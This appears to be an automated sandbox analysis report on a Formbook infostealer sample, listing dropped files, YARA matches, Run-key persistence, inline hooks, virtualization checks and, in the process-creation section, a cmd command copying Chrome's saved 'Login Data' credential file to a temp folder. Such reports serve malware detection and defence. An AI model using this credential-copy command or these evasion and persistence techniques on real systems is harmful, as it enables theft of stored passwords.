Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0003DB10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00034C20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000D1C40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000F9C52
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000D8CB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00020E10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0001EE80
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0004BED0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000C2FA0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00047FE0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E54BE9C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E54FC23
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E546D29
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E54FB03
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E524B20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E577920
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E53661F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E55D620
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5312F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E53B295
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E54E372
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5363ED
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E575020
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E53D1F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E53E1B6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5361BB

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 000E6420 appears 38 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 000122F0 appears 160 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 6E55C7C0 appears 137 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 6E52F9A0 appears 73 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 00058310 appears 67 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 6E530370 appears 56 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 6E5535F0 appears 55 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 0295B150 appears 136 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 04AFB150 appears 136 times

Source: focus.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: player-toolkit.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: focus.exe, 00000000.00000002.196953133.0000000002810000.00000002.00000001.sdmp

Binary or memory string: OriginalFilenameuser32j% vs focus.exe

Source: focus.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/15@1/1

Source: C:\Users\user\Desktop\focus.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Users\user\Desktop\focus.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\focus.exe

File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01

Source: C:\Users\user\Desktop\focus.exe

File created: C:\Users\user\AppData\Local\Temp\nsv512F.tmp

Jump to behavior

Source: focus.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\focus.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\focus.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: focus.exe	Virustotal: Detection: 68%
Source: focus.exe	Metadefender: Detection: 26%
Source: focus.exe	ReversingLabs: Detection: 89%

Source: C:\Users\user\Desktop\focus.exe

File read: C:\Users\user\Desktop\focus.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\focus.exe 'C:\Users\user\Desktop\focus.exe'
Source: C:\Users\user\Desktop\focus.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Source: C:\Users\user\Desktop\focus.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Source: C:\Users\user\Desktop\focus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\focus.exe

File written: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\config.ini

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: focus.exe

Static file information: File size 2844959 > 1048576

Source: focus.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: C:\workdir\build\Release_TS\IDMBrBtn\icu4c-57_1-src\obj\win3.pdb source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, wscript.exe, 00000018.00000002.463956730.00000000049EC000.00000004.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr
Source:	Binary string: D:\winx64-packages\Release\Release\PotPlayer\obj\Vi.pdb source: player-toolkit.exe, 00000002.00000002.359142610.000000006E4D6000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.464579995.000000006E616000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp, libdisplay4-1.dll.0.dr
Source:	Binary string: wntdll.pdbUGP source: player-toolkit.exe, 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: player-toolkit.exe, wscript.exe
Source:	Binary string: wscript.pdb source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Unpacked PE file: 2.2.player-toolkit.exe.10000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_0001C8D0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_000268DD push 00000061h; retf
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_000269D2 push eax; retf
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_000271EC push edx; iretd
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027A43 push esp; iretd
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027A65 push esp; iretd
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027AB9 push esp; iretd
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027AED push esp; iretd
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027D42 push edx; ret
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002BE22 push edx; iretd
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CEA5 push eax; ret
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CEF2 push eax; ret
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CEFB push eax; ret
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CF5C push eax; ret
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029AD0D1 push ecx; ret
Source: C:\Windows\explorer.exe	Code function: 19_2_065C33E6 pushad ; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B4D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E71EC push edx; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003EDA32 push esp; retf
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7A65 push esp; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7A43 push esp; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7AB9 push esp; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7AED push esp; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003EDBA4 push es; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7D42 push edx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003EBE22 push edx; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003ECEA5 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003ECEFB push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003ECEF2 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003ECF5C push eax; ret
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_001478AC push ecx; ret
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E52FF4F push ecx; ret

Source: C:\Users\user\Desktop\focus.exe	File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll	Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe	File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe	File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll	Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe	File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\focus.exe

File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\ReadMe.txt

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE8

Source: C:\Users\user\Desktop\focus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	RDTSC instruction interceptor: First address: 00000000000198E4 second address: 00000000000198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	RDTSC instruction interceptor: First address: 0000000000019B4E second address: 0000000000019B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000003D98E4 second address: 00000000003D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000003D9B4E second address: 00000000003D9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\focus.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 2_2_00019A80 rdtsc

Source: C:\Users\user\Desktop\focus.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll			Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59890s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59781s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59673s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59563s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59454s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59345s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59236s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59126s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59017s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58907s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58798s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58689s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58579s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58470s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58360s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58251s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58142s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58032s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57923s >= -30000s
